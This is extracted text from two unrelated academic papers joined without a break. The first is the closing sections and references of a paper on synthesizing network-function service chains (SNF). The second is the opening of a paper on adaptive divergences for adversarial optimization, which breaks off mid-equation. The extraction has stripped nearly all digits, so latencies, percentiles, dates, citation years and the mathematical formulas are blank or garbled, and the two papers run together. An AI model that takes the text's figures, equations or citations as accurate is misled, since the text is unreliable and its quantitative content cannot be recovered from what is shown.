horizontal line of the boxplots) are close to the median latencies and we find this result to be encouraging. second, large frames (i.e., , bytes) face two times greater median latency than the smaller ones regardless of the rule configuration. third, there are outliers that are an order of magnitude less/greater than the medians (e.g., µs at the st and µs at th percentiles for -byte frames and µs at the st and µs at th percentiles for mtu-sized frames). part of this latency variance is due to the batch i/o and processing techniques of the fastclick framework; as shown in fig. , these techniques offer high throughput, but have a well-studied effect on the latency variance. verification in this section we discuss tools that could potentially be utilized to systematically verify the correctness of the synthesis proposed by snf. recent efforts have employed model checking (canini et al., ; kim et al., a) techniques to explore the (voluminous) state space of modern networked systems in an attempt to find state inconsistencies due to etc. bugs or misconfigurations. symbolic execution has also been utilized either alone (kuzniar et al., ; dobrescu & argyraki, ) or combined with model checking (canini et al., ), to systematically identify representative input events (i.e., packets) that can adequately exercise code paths without requiring exhaustive exploration of the input space (hence bounding the verification time). specifically, software dataplane verification (dobrescu & argyraki, ) might be suitable for verifying nfv service chains. dobrescu and argyraki proposed a scalable approach to verifying complex nfv pipelines, by verifying each internal element of the pipeline in isolation; then by composing the results the authors proved certain properties about the entire pipeline. one could use this tool to systematically verify a complex part of snf, which is the traffic classification. however, this tool might not be able to provide sound proofs regarding all the stateful modifications of snf, since the authors verified katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. only two simple stateful cases (i.e., a nat and a traffic monitor) and did not generalize their ideas for a broader list of nfv flow modification elements. soft (kuzniar et al., ) could also be employed to test the interoperability between a chain realized with and without snf. in other words, soft could inject a broad set of inputs to test whether the synthesizednf defined in the ‘abstract service chain representation’ section outputs packets that are identical with the packets delivered by the original set of nfs. similarly, hsa (kazemian, varghese & mckeown, ) could be used to verify loop-freedom, slice isolation, and reachability properties of snf service chains. unfortunately, hsa statically operates on a snapshot of the network configuration, hence is unable to track dynamic state modifications caused by continuous events. soft is a special-purpose verification engine for software-defined networking (sdn) agent implementations. therefore, both works would require significant additional effort to verify stateful nfv pipelines. finally, translating an snf processing graph into a finite state machine understandable by kinetic (kim et al., a) would potentially allow kinetic to use its model checker to verify certain properties for the entire pipeline. however, kinetic does not systematically verify the actual code that runs in the network, but rather builds and verifies a model of this code. therefore, it is unclear (i) whether a kinetic model can sufficiently cover complex service chains such as the isp-level chains presented in the ‘real service chain deployments’ section and (ii) whether kinetic’s located packet equivalence classes (lpecs) can handle the complex tcus of snf without causing state space explosion. to summarize, although the works above have provided remarkable advancements in software verification, a substantial amount of additional research is required to provide strong guarantees about the correctness of snf. for this reason, in this paper we focus our attention on delivering high speed pipelines for complex and stateful nfv service chains and leave the verification of snf as a future work. limitations we do not attempt to provide a solution that can synthesize arbitrary software components, but rather target a broad but finite set of middlebox-specific nfs that operate on the entire space of a packet’s header. snf makes two assumptions: ( ) an nfv provider must specify an nf as an ensemble of abstract packet processing elements (i.e., the nf dag defined in the ‘service chain configuration’ section). we believe that this is a reasonable assumption, followed also by other state of the art approaches, such as click, slick, and openbox. however, if a middlebox provider does not want to share this information, under non-disclosure or via a licensing agreement, then snf can synthesize the middleboxes before and after this provider’s middlebox. this is possible by omitting the processing graph of this middlebox from the inputs given to the service chain configurator (see the ‘service chain configuration’ section). ( ) no further decision (i.e., read) utilizes an already rewritten field, therefore, an lb that splits traffic based on source port after a source napt, might not be synthesizable. in such a case, snf can exclude the lb from the synthesis. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. moreover, our tool does not support network-wide placement of the chain’s components, but we envision snf being integrated in controllers, such as e or slick. related work over the last decade, there has been considerable evolution of software-based packet processing architectures that realize wireline throughputs, while providing flexible and cost effective in-cloud network processing. monolithic middlebox implementations. until recently, most nfv approaches have treated nfs as monolithic entities placed at arbitrary locations in the network. in this context, even with the assistance of state of the art oss, such as the click-based clickos (martins et al., ) together with fast network i/o (rizzo, ; dpdk, ) and processing (kim et al., ; kim et al., b; barbette, soldani & mathy, ) mechanisms, chaining more than nfs leads to serious performance degradation as stated by the authors of both clickos and netvm (hwang, ramakrishnan & wood, ). the main reason, as shown in our experiments, for this poor performance is the i/o overhead due to forwarding packets along physically remote and virtualized nfs. more recently, opennetvm (zhang et al., ) showed that vm-based nfv deployments do not scale with increasing number of chained instances, hence opted for nfs running in lightweight docker containers (docker, san francisco, ca, usa) interconnected with shared memory segments. consolidation at the machine level. concentrating network processing into a single machine is a logical way to overcome the limitations stated above. comb (sekar et al., ) consolidates middlebox-oriented flow processing into one machine, mainly at the session layer. similarly, opennf (gember-jacobson et al., ) provides a programming interface to migrate nfs, which can in turn be collocated in a physical server. dpiaas (bremler-barr et al., ) reuses the costly deep packet inspection (dpi) logic across multiple instances. routebricks (dobrescu et al., ) exploits parallelism to scale software routers across multiple servers and cores within a single server, while packetshader (han et al., ) and nba (kim et al., b) take advantage of cheap and powerful auxiliary hardware components (such as gpus) to provide fast packet processing. all of these works only partially exploit the benefits of sharing common middlebox functionality, thus they are far from supporting optimized service chains. consolidation at the individual function level is the next level of composition of scalable and efficient nf deployments. in this context, open middleboxes (xomb) by anderson et al. ( ) proposes an incrementally scalable network processing pipeline based on triggers that pass the flow control from one element to another in a pipeline. the xomb architecture allows great flexibility in sharing parts of the pipeline; however, it only targets request-oriented protocols and services, unlike our generic framework. slick (anwer et al., ) operates on the same level of packet processing as snf to compose distributed, network-wide service chains driven by a controller. slick provides its own programming language to achieve this composition and unlike our work, it addresses placement requirements. slick is very efficient when deploying service chains that are not katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. necessarily collocated. however, we argue that in many cases all the nfs of a service chain need to be deployed in one machine to effectively dispatch processing across cores in the same socket. slick does not allow all of the nf elements to be physically placed into a single process. our work goes beyond slick by trading the flexibility of placing nf elements on demand for extensive consolidation of the chain processing. our synthesized snf realizes such chains with zero redundancy of individual packet operations. very recently, bremler-barr, harchol & hay ( ) applied the sdn control and dataplane separation paradigm to openbox; a framework for network-wide deployment and management of nfs. openbox applications input different nf specifications to the openbox controller via a north-bound application programming interface. the controller communicates the nf specifications to the openbox instances (obis) that constitute the actual dataplane, ensuring smart nf placement and scaling. an interesting feature of the openbox controller is its ability to merge different processing graphs, from different nfs, into a single and shorter processing graph, similar to our snf. the authors of openbox made a similar observation with us regarding the need to classify the traffic of a service chain only once, and then apply a set of operations that originate from the different nfs of the chain. however, openbox does not highly optimize the result chain-level processing graph for two reasons: (i) the openbox merge algorithm can only merge homogeneous packet modification elements (i.e., elements with the same type). for example, two ‘‘decrement ip ttl’’ elements, that each decrements the ttl field by one, can be merged into a single element that directly decrements the ttl field by two. imagine, however, the case where openbox has to merge the nfs of fig. . in this example, openbox cannot merge the ‘‘rewrite flow’’ element (that modifies the source and destination ip addresses as well as the source port of udp packets) with the ‘‘decrement ip ttl’’ elements, since these elements do not belong to the same type. this means that the final openbox graph will have distinct packet modification elements (i.e., ‘‘rewrite flow’’ and ‘‘decrement ip ttl’’) and each element has to compute the ip and udp checksums separately. therefore, openbox does not completely eliminate redundant operations. in contrast, snf effectively synthesized the operations of all these elements into a single element (see fig. ) that computes the ip and udp checksums only once. consequently, snf produces both a shorter processing graph and a synthesized chain with no redundancy, hence achieving lower latency. (ii) although openbox can merge the classification elements of a chain into a single classifier, the authors have not addressed how they handle the increased complexity of the final classifier. our preliminary experiments showed that in complex use cases, such as the isp-level traffic classification presented in the ‘real service chain deployments’ section, the complexity of the chain-level classifier dramatically increases with increasing number of acl rules. therefore, snf implements the lazy subtraction technique proposed by kazemian, varghese & mckeown ( ). the benefits of this technique are stated in the ‘fastclick extensions’ section. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. finally, the authors of openbox did not stress the limits of the openbox framework in their performance evaluation. an input packet rate of – gbps cannot adequately stress the memory utilization of the obis. moreover, there is limited discussion related to how openbox exploits the multi-core capacities of modern nfv infrastructures. in contrast, in the ‘a chain of routers at the cost of one,’ ‘stateful service chaining’ and ‘real service chain deployments’ sections we demonstrated how snf realizes complex, purely software-based service chains at gbps line-rate. this is possible by exploiting multiple cpu cores and by fitting most of the data of an entire service chain into those cores’ l caches. scheduling nfs for high throughput. recently, the e nfv framework (palkar et al., ) demonstrated a scalable way of deploying nfv services. e mainly tackles placement, elastic scaling, and service composition by introducing pipelets. a pipelet defines a traffic class and a corresponding dag of nfs that should process this traffic class. snf’s tcus are somewhat similar to e ’s pipelets, but snf aims to make them more efficient. concretely, an snf tcu is not processed by a dag of nfs, but rather by a highly optimized piece of code (produced by the synthesizer) that directly applies a set of operations to this specific traffic class. impact. e can use snf to fit more service chains into one machine, hence postpone its elastic scaling. existing approaches can transparently use our extensions to provide services such as (i) lightweight xen vms that run synthesized clickos instances using the netmap network i/o, (ii) parallelized service chains using the multi-server, multi-core routebricks architecture, and (iii) synthesized chains that are load balanced across heterogeneous hardware components (i.e., cpu and gpu) using nba. conclusion we have addressed the problem of synthesizing chains of nfs with snf. snf requires minimal i/o interactions with the nfv platform and applies single-read-single-write operations on the packets, while early-discarding irrelevant traffic classes. snf maintains state across nfs. to realize the above properties, we parse the chained nfs and build a classification graph whose leaves represent unique traffic class units. in each leaf we perform a set of packet header modifications to generate an equivalent configuration that implements the same functionality as the initial chain using a minimal set of elements. snf synthesizes stateful chains that appear in production isp-level networks realizing high throughput and low latency, while outperforming state of the art works. additional information and declarations funding the research leading to these results has been co-funded by the european union (eu) in the context of (i) the european research council under eu’s seventh framework programme (fp / - ) / erc grant agreement and (ii) the behavioural based forwarding (beba) project with grant agreement number . there was no katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. competing interests the authors declare there are no competing interests. author contributions • georgios p. katsikas conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • marcel enguehard conceived and designed the experiments, performed the computation work, reviewed drafts of the paper. • maciej kuźniar conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • gerald q. maguire jr and dejan kostić wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/gkatsikas/fastclick/tree/snf. references anderson jw, braud r, kapoor r, porter g, vahdat a. . xomb: extensible open middleboxes with commodity servers. in: proceedings of the eighth acm/ieee symposium on architectures for networking and communications systems, ancs ’ . new york, ny, usa: acm, – . anwer b, benson t, feamster n, levin d. . programming slick network functions. in: proceedings of the st acm sigcomm symposium on software defined networking research, sosr ’ . new york, ny, usa: acm, : – : . bagnulo m, matthews p, van beijnum i. . stateful nat : network address and protocol translation from ipv clients to ipv servers. request for comments (rfc) (proposed standard). the internet engineering task force, fremont. available at https://www.rfc-editor.org/rfc/rfc .txt. barbette t, soldani c, mathy l. . fast userspace packet processing. in: proceedings of the eleventh acm/ieee symposium on architectures for networking and communica- tions systems, ancs ’ . piscataway: ieee computer society, – . bremler-barr a, harchol y, hay d. . openbox: a software-defined framework for developing, deploying, and managing network functions. in: proceedings of the conference on acm sigcomm conference, sigcomm ’ . new york: acm, – . katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/gkatsikas/fastclick/tree/snf https://www.rfc-editor.org/rfc/rfc .txt http://dx.doi.org/ . /peerj-cs. bremler-barr a, harchol y, hay d, koral y. . deep packet inspection as a service. in: proceedings of the th acm international on conference on emerging networking experiments and technologies, conext ’ . new york: acm, – . canini m, venzano d, perešíni p, kostić d, rexford j. . a nice way to test openflow applications. in: proceedings of the th usenix conference on networked systems design and implementation, nsdi ’ . berkeley: usenix association, . cisco. . scaling nfv—the performance challenge. available at http://blogs.cisco.com/ enterprise/scaling-nfv-the-performance-challenge. dobrescu m, argyraki k. . software dataplane verification. in: proceedings of the th usenix conference on networked systems design and implementation, nsdi ’ . berkeley: usenix association, – . dobrescu m, argyraki k, iannaccone g, manesh m, ratnasamy s. . controlling parallelism in a multicore software router. in: proceedings of the workshop on programmable routers for extensible services of tomorrow, sosp ’ . new york: acm, : – : . dobrescu m, egi n, argyraki k, chun b-g, fall k, iannaccone g, knies a, manesh m, ratnasamy s. . routebricks: exploiting parallelism to scale software routers. in: proceedings of the acm sigops nd symposium on operating systems principles. new york: acm, – . dpdk. . data plane development kit (dpdk). available at http://dpdk.org. emmerich p, gallenmüller s, raumer d, wohlfart f, carle g. . moongen: a scriptable high-speed packet generator. in: proceedings of the acm conference on internet measurement conference, imc ’ . new york: acm, – . enguehard m. . hyper-nf: synthesizing chains of virtualized network functions. masters thesis, kth school of information and communication technology (ict) available at http://kth.diva-portal.org/smash/get/diva : /fulltext . european telecommunications standards institute. . nfv whitepaper. available at https://portal.etsi.org/nfv/nfv_white_paper.pdf. evans d. . the internet of things: how the next evolution of the internet is changing everything. cisco internet business solutions group (ibsg), – . available at https: //www.cisco.com/c/dam/en_us/about/ac /docs/innov/iot_ibsg_ final.pdf . gember-jacobson a, viswanathan r, prakash c, grandl r, khalid j, das s, akella a. . opennf: enabling innovation in network function control. in: proceedings of the acm conference on sigcomm, sigcomm ’ . new york: acm, – . han s, jang k, park k, moon s. . packetshader: a gpu-accelerated software router. acm sigcomm computer communication review ( ): – doi . / . . hwang j, ramakrishnan kk, wood t. . netvm: high performance and flexible networking using virtualization on commodity platforms. in: proceedings of the th usenix conference on networked systems design and implementation, nsdi ’ . berkeley: usenix association, – . intel. . receiver-side scaling (rss). available at http://www.intel.com/content/dam/ support/us/en/documents/network/sb/ us .pdf. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://blogs.cisco.com/enterprise/scaling-nfv-the-performance-challenge http://blogs.cisco.com/enterprise/scaling-nfv-the-performance-challenge http://dpdk.org http://kth.diva-portal.org/smash/get/diva : /fulltext https://portal.etsi.org/nfv/nfv_white_paper.pdf https://www.cisco.com/c/dam/en_us/about/ac /docs/innov/iot_ibsg_ final.pdf https://www.cisco.com/c/dam/en_us/about/ac /docs/innov/iot_ibsg_ final.pdf http://dx.doi.org/ . / . http://www.intel.com/content/dam/support/us/en/documents/network/sb/ us .pdf http://www.intel.com/content/dam/support/us/en/documents/network/sb/ us .pdf http://dx.doi.org/ . /peerj-cs. katsikas gp. . snf extensions of fastclick’s stateful flow processing elements. available at https://github.com/gkatsikas/fastclick/tree/snf. kazemian p, varghese g, mckeown n. . header space analysis: static checking for networks. in: proceedings of the th usenix conference on networked systems design and implementation. berkeley: usenix association, – . kim h, reich j, gupta a, shahbaz m, feamster n, clark r. a. kinetic: verifiable dy- namic network control. in: proceedings of the th usenix conference on networked systems design and implementation, nsdi ’ . berkeley: usenix association, – . kim j, huh s, jang k, park k, moon s. . the power of batching in the click modular router. in: proceedings of the asia–pacific workshop on systems, apsys ’ . new york: acm, : – : . kim j, jang k, lee k, ma s, shim j, moon s. b. nba (network balancing act): a high-performance packet processing framework for heterogeneous processors. in: proceedings of the tenth european conference on computer systems, eurosys ’ . new york: acm, : – : . kohler e, morris r, chen b, jannotti j, kaashoek mf. . the click modular router. acm transactions on computer systems ( ): – doi . / . . kuzniar m, peresini p, canini m, venzano d, kostić d. . a soft way for openflow switch interoperability testing. in: proceedings of the th international conference on emerging networking experiments and technologies, conext ’ . new york: acm, – . liu w, li h, huang o, boucadair m, leymann n, fu q, sun q, pham c, huang c, zhu j, he p. . service function chaining (sfc) general use cases. internet-draft draft- liu-sfc-use-cases- . ietf secretariat. available at https://tools.ietf.org/html/draft- liu-sfc-use-case- . martins j, ahmed m, raiciu c, olteanu v, honda m, bifulco r, huici f. . clickos and the art of network function virtualization. in: proceedings of the th usenix conference on networked systems design and implementation, nsdi ’ . berkeley: usenix association, – . mckeown n, anderson t, balakrishnan h, parulkar g, peterson l, rexford j, shenker s, turner j. . openflow: enabling innovation in campus networks. acm sigcomm computer communication review ( ): – doi . / . . palkar s, lan c, han s, jang k, panda a, ratnasamy s, rizzo l, shenker s. . e : a framework for nfv applications. in: proceedings of the th symposium on operating systems principles, sosp ’ . new york: acm, – . penno r, wing d, boucadair m. . pcp support for nested nat environments. internet-draft draft-penno-pcp-nested-nat- . ietf secretariat. available at https: //tools.ietf.org/html/draft-penno-pcp-nested-nat- . perreault s, yamagata i, miyakawa s, nakagawa a, ashida h. . common re- quirements for carrier-grade nats (cgns). rfc (best current practice). the internet engineering task force, fremont. available at https://www.rfc-editor.org/ rfc/rfc .txt. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/gkatsikas/fastclick/tree/snf http://dx.doi.org/ . / . https://tools.ietf.org/html/draft-liu-sfc-use-case- https://tools.ietf.org/html/draft-liu-sfc-use-case- http://dx.doi.org/ . / . https://tools.ietf.org/html/draft-penno-pcp-nested-nat- https://tools.ietf.org/html/draft-penno-pcp-nested-nat- https://www.rfc-editor.org/rfc/rfc .txt https://www.rfc-editor.org/rfc/rfc .txt http://dx.doi.org/ . /peerj-cs. quinn p, nadeau t. . problem statement for service function chaining. rfc (informational). the internet engineering task force, fremont. available at https: //www.rfc-editor.org/rfc/rfc .txt. rizzo l. . netmap: a novel framework for fast packet i/o. in: proceedings of the usenix conference on annual technical conference, usenix atc ’ . berkeley: usenix association, – . sdx central. . performance—still fueling the nfv discussion. available at https: //www.sdxcentral.com/articles/contributed/vnf-performance-fueling-nfv-discussion- kelly-leblanc/ / . sekar v, egi n, ratnasamy s, reiter mk, shi g. . design and implementation of a consolidated middlebox architecture. in: proceedings of the th usenix conference on networked systems design and implementation, nsdi ’ . berkeley: usenix association, – . sherry j, hasan s, scott c, krishnamurthy a, ratnasamy s, sekar v. . making middleboxes someone else’s problem: network processing as a cloud service. in: proceedings of the acm sigcomm conference on applications, technologies, architectures, and protocols for computer communication, sigcomm ’ . new york: acm, – . sun w, ricci r. . fast and flexible: parallel packet processing with gpus and click. in: proceedings of the ninth acm/ieee symposium on architectures for networking and communications systems, ancs ’ . piscataway: ieee press, – available at http://dl.acm.org/citation.cfm?id= . . taylor de, turner js. . classbench: a packet classification benchmark. ieee/acm transactions on networking ( ): – doi . /tnet. . . woo s, park k. . scalable tcp session monitoring with symmetric receive-side scaling. kaist technical report. kaist, daejeon, – . zhang w, liu g, zhang w, shah n, lopreiato p, todeschi g, ramakrishnan k, wood t. . opennetvm: a platform for high performance network service chains. in: proceedings of the acm sigcomm workshop on hot topics in middleboxes and network function virtualization. new york: acm. katsikas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.rfc-editor.org/rfc/rfc .txt https://www.rfc-editor.org/rfc/rfc .txt https://www.sdxcentral.com/articles/contributed/vnf-performance-fueling-nfv-discussion-kelly-leblanc/ / https://www.sdxcentral.com/articles/contributed/vnf-performance-fueling-nfv-discussion-kelly-leblanc/ / https://www.sdxcentral.com/articles/contributed/vnf-performance-fueling-nfv-discussion-kelly-leblanc/ / http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /tnet. . http://dx.doi.org/ . /peerj-cs. submitted november accepted april published may corresponding author maxim borisyak, mborisyak@hse.ru academic editor charles elkan additional information and declarations can be found on page doi . /peerj-cs. copyright borisyak et al. distributed under creative commons cc-by . open access adaptive divergence for rapid adversarial optimization maxim borisyak , tatiana gaintseva and andrey ustyuzhanin , laboratory of methods for big data analysis, national research university higher school of economics, moscow, russia physics department, imperial college, london, united kingdom abstract adversarial optimization provides a reliable, practical way to match two implicitly defined distributions, one of which is typically represented by a sample of real data, and the other is represented by a parameterized generator. matching of the distributions is achieved by minimizing a divergence between these distribution, and estimation of the divergence involves a secondary optimization task, which, typically, requires training a model todiscriminate betweenthese distributions. thechoice ofthe modelhas itstrade- off: high-capacity models provide good estimations of the divergence, but, generally, require large sample sizes to be properly trained. in contrast, low-capacity models tend to require fewer samples for training; however, they might provide biased estimations. computational costs of adversarial optimization becomes significant when sampling from the generator is expensive. one of the practical examples of such settings is fine- tuning parameters of complex computer simulations. in this work, we introduce a novel family of divergences that enables faster optimization convergence measured by the number of samples drawn from the generator. the variation of the underlying discriminator model capacity during optimization leads to a significant speed-up. the proposed divergence family suggests using low-capacity models to compare distant distributions (typically, at early optimization steps), and the capacity gradually grows as the distributions become closer to each other. thus, it allows for a significant acceleration of the initial stages of optimization. this acceleration was demonstrated on two fine-tuning problems involving pythia event generator and two of the most popular black-box optimization algorithms: bayesian optimization and variational optimization. experiments show that, given the same budget, adaptive divergences yield results up to an order of magnitude closer to the optimum than jensen-shannon divergence. while we consider physics-related simulations, adaptive divergences can be applied to any stochastic simulation. subjects data mining and machine learning, optimization theory and computation, scientific computing and simulation keywords adversarial optimization, black-box optimization, computer simulations introduction adversarial optimization (ao), introduced in generative adversarial networks (good- fellow et al., ), became popular in many areas of machine learning and beyond with applications ranging from generative (radford, metz & chintala, ) and inference how to cite this article borisyak m, gaintseva t, ustyuzhanin a. . adaptive divergence for rapid adversarial optimization. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:mborisyak@hse.ru https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. for instance, compare training times, network capacities and computational resources reported by simonyan & zisserman ( ) and choi et al. ( ). there are ways to estimate gradients of such programs, for example, see (baydin et al., ). however, all methods known to the authors require training a surrogate, which encounters the problem of the expensive sampling procedures mentioned above. tasks (dumoulin et al., ), improving image quality (isola et al., ) to tuning stochastic computer simulations (louppe, hermans & cranmer, ). ao provides a reliable, practical way to match two implicitly defined distributions, one of which is typically represented by a sample of real data, and the other is represented by a parameterized generator. matching of the distributions is achieved by minimizing a divergence between these distribution, and estimation of the divergence involves a secondary optimization task, which, typically, requires training a model to discriminate between these distributions. the model is referred to as discriminator or critic (for simplicity, we use term discriminator everywhere below). training a high-capacity model, however, is computationally expensive (metz et al., ) as each step of divergence minimization is accompanied by fitting the discriminator; therefore, adversarial training often requires significantly more computational resources than, for example, a classification model with a comparable architecture of the networks. nevertheless, in conventional settings like gan, this problem is not pronounced for at least two reasons. firstly, the generator is usually represented by a deep neural network, and sampling is computationally cheap; thus, for properly training the discriminator, a sample of a sufficient size can be quickly drawn. secondly, gan training procedures are often regarded not as minimization of a divergence, but as game-like dynamics (li et al., ; mescheder, geiger & nowozin, ); such dynamics typically employ gradient optimization with small incremental steps, which involve relatively small sample sizes for adapting the previous discriminator to an updated generator configuration. computational costs of ao become significant when sampling from the generator is computationally expensive, or optimization procedure does not operate by performing small incremental steps (metz et al., ). one of the practical examples of such settings is fine-tuning parameters of complex computer simulations. such simulators are usually based on physics laws expressed in computational mathematical forms like differential or stochastic equations. those equations relate input or initial conditions to the observable quantities under conditions of parameters that define physics laws, geometry, or other valuable property of the simulation; these parameters do not depend on inputs or initial conditions. it is not uncommon that such simulations have very high computational complexity. for example, the simulation of a single proton collision event in the cern atlas detector takes several minutes on a single core cpu (the atlas collaboration, ). due to typically high dimensionality, it takes a considerable amount of samples for fine-tuning, which in turn increases the computational burden. another essential property of such computer simulations is the lack of gradient information over the simulation parameters. computations are represented by sophisticated computer programs, which are challenging to differentiate. thus, global black-box optimization methods are often employed; bayesian optimization is one of the most popular approaches. in this work, we introduce a novel family of divergences that enables faster optimization convergence measured by the number of samples drawn from the generator. the variation of the underlying discriminator model capacity during optimization leads to a significant speed-up. the proposed divergence family suggests using low-capacity models to compare borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. distant distributions (typically, at early optimization steps), and the capacity gradually grows as the distributions become closer to each other. thus, it allows for a significant acceleration of the initial stages of optimization. additionally, the proposed family of divergences is broad, which offers a wide range of opportunities for further research. we demonstrate the basic idea with some toy examples, and with a realistic challenge of tuning pythia event generator (sjöstrand, mrenna & skands, ; sjostrand et al., ) following louppe, hermans & cranmer ( ) and ilten, williams & yang ( ). we consider physics-related simulations; nevertheless, all proposed methods are simulation- agnostic. background adversarial optimization, initially introduced for generative adversarial networks (gan) (goodfellow et al., ), offers a general strategy for matching two distributions. consider feature space x , ground-truth distribution p, and parametrized family of distributions qψ implicitly defined by a generator with parameters ψ. formally, we wish to find such ψ∗, that p =qψ∗ almost everywhere. ao achieves that by minimizing a divergence or a distance between p and qψ with respect to ψ. one of the most popular divergences is jensen–shannon divergence: jsd(p,qψ)= [ kl(p‖mψ)+kl(qψ‖mψ) ] = e x∼p log p(x) mψ(x) + e x∼qψ log q(x) mψ(x) ; ( ) where: kl —kullback–leibler divergence, mψ(x)= ( p(x)+qψ(x) ) . the main insight of goodfellow et al. ( ) is that jsd can be estimated by training a discriminator f to distinguish between p and qψ: log −min f∈f l(f ,p,qψ)= log −min f∈f { − e x∼p log ( f (x) ) − e x∼qψ log ( −f (x) )} = log + { e x∼p log ( f ∗(x) ) + e x∼qψ log ( −f ∗(x) )} = log + { e x∼p log p(x) qψ(x)+p(x) + e x∼qψ log qψ(x) qψ(x)+p(x) } = e x∼p log p(x) mψ(x) + e x∼qψ log q(x) mψ(x) = jsd(p,qψ); ( ) where: l —cross-entropy loss function, f ={f :x →[ , ]} is the set of all possible discriminators, and f ∗ is the optimal discriminator. similar formulations also exist for other divergences such as wasserstein (arjovsky, chintala & bottou, ) and cramer (bellemare et al., ) distances. in classical gan, both generator and discriminator are represented by differentiable neural networks. hence, a subgradient of jsd(p,qψ) can be easily computed (goodfellow borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. et al., ). the minimization of the divergence can be performed by a gradient method, and the optimization procedure goes iteratively following those steps: • using parameters of the discriminator from the previous iteration as an initial guess, adjust f by performing several steps of the gradient descent to minimize l(f ,p,qψ); • considering f as a constant, compute the gradient of l(f ,p,qψ) w.r.t. ψ, perform one step of the gradient ascent. for computationally heavy generators, gradients are usually practically unfeasible; therefore, we consider black-box optimization methods. one of the most promising methods for black-box ao is adversarial variational optimization (louppe, hermans & cranmer, ), which combines ao with variational optimization (wierstra et al., ). this method improves upon conventional variational optimization (vo) over jensen–shannon divergence by training a single discriminator to distinguish samples from ground-truth distribution and samples from a mixture of generators, where the mixture is defined by the search distribution of vo. this eliminates the need to train a classifier for each individual set of parameters drawn from the search distribution. bayesian optimization (bo) (mockus, ) is another commonly used black-box optimization method, with applications including tuning of complex simulations (ilten, williams & yang, ). as we demonstrate in ‘experiments, bo can be successfully applied for adversarial optimization. adaptive divergence notice, that in equation eq. ( ) minimization is carried over the set of all possible discriminators f ={f : x → [ , ]}. in practice, this is intractable and set f is approximated by a model such as deep neural networks. everywhere below, we use terms ‘low-capacity’ and ‘high-capacity’ to describe the set of feasible discriminator functions: low-capacity models are either represent a narrow set of functions (e.g., logistic regression, shallow decision trees) or are heavily regularized (see ‘implementation’ for more examples of capacity regulation); high-capacity models are sufficient for estimating jsd for an adversarial optimization problem under consideration. in conventional gan settings, the generator is represented by a neural network, sampling is computationally cheap, and usage of high-capacity discriminators is satisfactory. in our case, as was discussed above, simulations tend to be computationally heavy, which, combined with a typically slow convergence of black-box optimization algorithms, might make ao with a high-capacity model practically intractable. the choice of the model has its trade-off: high-capacity models provide good estimations of jsd, but, generally, require large sample sizes to be properly trained. in contrast, low- capacity models tend to require fewer samples for training; however, they might provide biased estimations. for example, if the classifier is represented by a narrow set of functions m ⊆f, then quantity: dm(p,q)= log −min f∈m l(f ,p,q); ( ) borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. might no longer be a divergence, so we refer to it as pseudo-divergence. definition a function d : (x)× (x)→r is a pseudo-divergence, if : (p ) ∀p,q∈ (x) :d(p,q)≥ ; (p ) ∀p,q ∈ (x) : (p = q) ⇒ d(p,q) = ; where (x) —set of all probability distributions on space x . it is tempting to use a pseudo-divergence dm produced by a low-capacity model m for adversarial optimization, however, a pseudo-divergence might not guarantee proper convergence as there might exist such ψ ∈ , that jsd(p,qψ) > , while d(p,qψ)= . for example, naive bayes classifier is unable to distinguish between p and q that have the same marginal distributions. nevertheless, if model m is capable of distinguishing between p and some qψ, dm still provides information about the position of the optimal parameters in the configuration space ψ∗ by narrowing search volume, ilten, williams & yang ( ) offers a good demonstration of this statement. the core idea of this work is to replace jensen–shannon divergence with a so-called adaptive divergence that gradually adjusts model capacity depending on the ‘difficulty’ of the classification problem with the most ‘difficult’ problem being distinguishing between two equal distributions. formally, this gradual increase in model complexity can be captured by the following definitions. definition a family of pseudo-divergences d={dα : (x)× (x)→r|α∈[ , ]} is ordered and complete with respect to jensen–shannon divergence if : (d ) dα is a pseudo-divergence for all α∈[ , ]; (d ) ∀p,q∈ (x) :∀ ≤α <α ≤ :dα (p,q)≤dα (p,q); (d ) ∀p,q∈ (x) :d (p,q)= jsd(p,q). there are numerous ways to construct a complete and ordered w.r.t. jsd family of pseudo-divergences. in the context of adversarial optimization, we consider the following three methods. the simplest one is to define a nested family of models m={mα⊆f|α∈[ , ]}, (e.g., by changing number of hidden units of a neural network), then use pseudo-divergence eq. ( ) to form a desired family. alternatively, for a parameterized model m ={f (θ,·)|θ ∈ }, one can use a regularization r(θ) to control ‘capacity’ of the model: dα(p,q)= log −l(f (θ ∗ ,·),p,q); ( ) θ ∗ = arg minθ∈ l(f (θ,·),p,q)+c( −α)·r(θ); where c : [ , ]→[ ,+∞) is a strictly increasing function and c( )= . the third, boosting-based method is applicable for a discrete approximation: dc(i)(p,q)= log −l(fi,p,q); ( ) fi =fi− +ρ ·arg 